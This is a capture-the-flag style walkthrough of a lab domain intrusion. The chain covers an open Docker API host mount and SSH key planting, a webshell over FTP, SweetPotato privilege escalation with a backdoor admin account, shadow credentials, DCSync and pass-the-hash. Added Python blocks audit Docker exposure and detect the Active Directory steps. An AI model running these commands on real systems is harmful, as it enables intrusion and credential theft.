Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Unauthorized Writeup

Instructions

Unauthorized is a cyber range of medium difficulty. Completing it helps players understand the techniques of proxy forwarding, intranet scanning, information gathering, privilege escalation and lateral movement used in intranet penetration, strengthens their understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. The range has 3 flags, spread across different target machines.

Technology

FTP, Privilege Elevation, AD CS, Kerberos, Domain Penetration

First flag

Unauthorized Docker API

External information gathering found the Docker daemon exposed without authentication (TCP port 2375).

https://cloud.tencent.com/developer/article/1744943

List the images:

docker -H tcp://47.92.7.138:2375 images

List the containers:

docker -H tcp://47.92.7.138:2375 ps -a

Start a container and mount the host's disk at /mnt:

docker -H tcp://47.92.7.138:2375 run -it -v /:/mnt --entrypoint /bin/bash ubuntu:18.04
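From the defender's side, the exposure used above comes down to one daemon setting. The following is an added example (not code from the original writeup) that audits a dockerd daemon.json for a TCP listener that accepts unauthenticated clients; the two configurations it checks are constructed samples, not the range's.

```python
"""Audit a dockerd daemon.json for the exposure used above: the Remote
API listening on a TCP socket that accepts unauthenticated clients.
Added example for defenders, not code from the original writeup; the
two configurations below are constructed samples, not the range's."""
import json
from urllib.parse import urlsplit

def audit_docker_hosts(daemon_json: str) -> list:
    """Return (listener, problem) pairs for every tcp:// listener.
    dockerd authenticates remote clients only when tlsverify is set
    (tls alone encrypts the channel but accepts any client), and a
    0.0.0.0 bind exposes the API on every interface."""
    cfg = json.loads(daemon_json)
    hosts = cfg.get("hosts", [])
    if isinstance(hosts, str):
        hosts = [hosts]
    findings = []
    for h in hosts:
        u = urlsplit(h)
        if u.scheme != "tcp":
            continue  # unix:// and fd:// sockets are local-only
        if not cfg.get("tlsverify", False):
            findings.append((h, "no client certificate verification"))
        if u.hostname in (None, "0.0.0.0", "::"):
            findings.append((h, "bound to all interfaces"))
    return findings

# Constructed samples: the weak setting beside the corrected one.
WEAK = json.dumps({"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]})
HARDENED = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_docker_hosts(cfg))
```

The same `-H tcp://` listener can also be set on the dockerd command line in the systemd unit, so check that as well as daemon.json.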

Write the public key

Generate a key pair on the VPS. After pressing Enter there are 3 prompts: the first is the file name, id_rsa by default (enter another name if you want to change it); the second and third are the passphrase and its confirmation, which is what you will type whenever the key is used. It is usually left empty; set one if you have stronger security needs. Two files are produced, id_rsa and id_rsa.pub: the .pub file is the public key, the other is the private key.

ssh-keygen -t rsa

Write the public key into /root/.ssh/authorized_keys on the target host (the host filesystem is mounted at /mnt):

cd /mnt/root/.ssh/

echo 'ssh-rsa AAAAB3NzaC1yc2..' >> authorized_keys

You can now log in over ssh directly with the private key from your own machine.

Looking for the flag only gives a hint that it is not here.

MySQL weak password

Check the ports open on this machine:

netstat -aptn

Checking the command history shows that the MySQL password is 123456 (it could also be brute-forced).

history

Access the MySQL database; the query on the f1agggg01 table returns the first flag:

mysql -uroot -p123456

mysql> show databases;

mysql> use secret;

mysql> show tables;

mysql> select * from f1agggg01;

Second flag

Standalone penetration

Upload npc to set up a proxy, then scan 172.22.7.0/24 with fscan:

172.22.7.67:8081 open
172.22.7.13:80 open
172.22.7.13:22 open
172.22.7.67:445 open
172.22.7.31:445 open
172.22.7.67:21 open
172.22.7.6:445 open
172.22.7.67:80 open
172.22.7.67:139 open
172.22.7.31:139 open
172.22.7.6:139 open
172.22.7.31:135 open
172.22.7.67:135 open
172.22.7.6:135 open
172.22.7.6:88 open
172.22.7.13:2375 open
[+] NetInfo:
[*]172.22.7.6
   [-]DC02
   [-]172.22.7.6
[*] 172.22.7.67 XIAORANG\WIN-9BMCSG0S
[*] WebTitle:http://172.22.7.13 code:200 len:27170 title:XX Decoration
[+] NetInfo:
[*]172.22.7.67
   [-]WIN-9BMCSG0S
   [-]172.22.7.67
[+] NetInfo:
[*]172.22.7.31
   [-]ADCS
   [-]172.22.7.31
[*] 172.22.7.31 XIAORANG\ADCS
[*] 172.22.7.6 [+]DC XIAORANG\DC02
[*] WebTitle:http://172.22.7.13:2375 code:404 len:29 title:None
[+] ftp://172.22.7.67:21:anonymous
   [-]1-1P3201024310-L.zip
   [-]1-1P320102603C1.zip
   [-]1-1P320102609447.zip
   [-]1-1P320102615Q3.zip
   [-]1-1P320102621J7.zip
   [-]1-1P320102J30-L.zip
[*] WebTitle:http://172.22.7.67 code:200 len:703 title:IIS Windows Server
[*] WebTitle:http://172.22.7.67:8081 code:200 len:4621 title:Company management backend
[+] http://172.22.7.13:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://172.22.7.67:8081/www.zip poc-yaml-backup-file
[+] http://172.22.7.13:2375 poc-yaml-go-pprof-leak

FTP anonymous access

http://172.22.7.67:8081/www.zip is a backup archive. After unpacking it, the download folder turns out to match the share exposed by the anonymous FTP login, so a webshell can be uploaded through FTP.

Shell address:

http://172.22.7.67:8081/download/shell.asp

Escalate privileges directly with a Potato: upload SweetPotato.exe.

SweetPotato.exe -a 'whoami'

Testing shows that 3389 is enabled, so add an account and log in:

SweetPotato.exe -a 'net user devyn Admin@123 /add'

SweetPotato.exe -a 'net localgroup administrators devyn /add'

Get the flag.

The third flag

Note that the newly created user cannot run domain commands, so you need to find a domain account and then log in with pass-the-hash; if you find the password you can log in directly. In fact, you can run mimikatz straight from the webshell to dump the hashes, but with remote desktop it is more convenient to run it from cmd.

Dumped the domain account zhangfeng/FenzGTaVF6En. Log in again with the domain account; note that the user name must be entered as [email protected]

Shadow Credentials

https://wiki.whoamianony.top/active-directory-methodology/shadow-credentials

The following accounts have write permission on the msDS-KeyCredentialLink attribute:

- Domain Administrator accounts
- Members of the Key Admins group
- Members of the Enterprise Key Admins group
- Accounts with GenericAll or GenericWrite permission on objects in Active Directory
- Machine accounts, on their own msDS-KeyCredentialLink attribute

zhangfeng is in the Key Admins group and therefore has write permission.

Add Shadow Credentials to the msDS-KeyCredentialLink attribute of the domain controller:

Whisker.exe add /target:DC02$ /domain:xiaorang.lab /dc:DC02.xiaorang.lab

After the addition succeeds, the program prints the command for requesting a TGT with certificate authentication. Note: append /ptt to the end of the command it prints.

The domain controller account is privileged, so Mimikatz can run DCSync to export the domain hashes:

mimikatz.exe 'privilege::debug' 'lsadump::dcsync /domain:xiaorang.lab /user:Administrator' exit
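The Shadow Credentials write and the DCSync step above each leave a Windows Security event on the DC: 5136 (directory object modified, attribute msDS-KeyCredentialLink) and 4662 (operation on an object, with the replication control-access rights). The following is an added detection example, not code from the original writeup; the events it runs over are constructed samples that reuse the range's names, and the point it makes is that the DCSync here runs as DC02$, so a DC allow-list alone would hide it unless correlated with the 5136 write.

```python
"""Detects the Shadow Credentials write and the DCSync step above from
Windows Security events 5136 (object modified) and 4662 (operation on an
object). Added example, not from the writeup; the events are constructed."""

REPL_RIGHTS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
               "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}  # DS-Replication-Get-Changes-All
VALUE_ADDED = "%%14674"  # 5136 OperationType code for "Value Added"

def first_cn(dn):  # 'CN=DC02,OU=Domain Controllers,DC=xiaorang,DC=lab' -> 'DC02'
    return dn.split(",", 1)[0].split("=", 1)[1]

def is_shadow_credential_write(ev):
    """5136 adding a msDS-KeyCredentialLink value by anyone other than the
    object itself (a computer rolling its own key is routine)."""
    if ev["EventID"] != 5136 or ev["OperationType"] != VALUE_ADDED:
        return False
    if ev["AttributeLDAPDisplayName"].lower() != "msds-keycredentiallink":
        return False
    return ev["SubjectUserName"].upper() != first_cn(ev["ObjectDN"]).upper() + "$"

def is_replication_request(ev):
    """4662 whose Properties carry a replication control-access right."""
    if ev["EventID"] != 4662:
        return False
    return bool({t.strip("{}") for t in ev["Properties"].lower().split()} & REPL_RIGHTS)

def triage(events, dc_accounts):
    """Events in time order. Replication by a DC account is normal unless its
    KeyCredentialLink was just written: after Whisker, DCSync runs as DC02$."""
    tampered, hits = set(), []
    for ev in events:
        if is_shadow_credential_write(ev):
            tampered.add(first_cn(ev["ObjectDN"]).upper() + "$")
            hits.append(("shadow-credentials", ev["SubjectUserName"], ev["ObjectDN"]))
        elif is_replication_request(ev):
            who = ev["SubjectUserName"].upper()
            if who not in dc_accounts or who in tampered:
                hits.append(("dcsync", ev["SubjectUserName"], ev["Properties"]))
    return hits

SAMPLE_EVENTS = [  # constructed, not real logs; the range's names, in time order
    {"EventID": 4662, "SubjectUserName": "DC02$", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 5136, "OperationType": VALUE_ADDED, "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "SubjectUserName": "WIN-9BMCSG0S$", "ObjectDN": "CN=WIN-9BMCSG0S,CN=Computers,DC=xiaorang,DC=lab"},
    {"EventID": 5136, "OperationType": VALUE_ADDED, "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "SubjectUserName": "zhangfeng", "ObjectDN": "CN=DC02,OU=Domain Controllers,DC=xiaorang,DC=lab"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]
```

On a real DC these events only appear when the Directory Service Changes (5136) and Directory Service Access (4662) audit subcategories are enabled and the objects carry matching SACL entries.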

Pass-the-hash

proxychains python3 wmiexec.py -hashes 00000000000000000000000000000000:bf967c5a0f7256e2eaba589fbd29a382 [email protected]

Original link: https://zhuanlan.zhihu.com/p/581451146
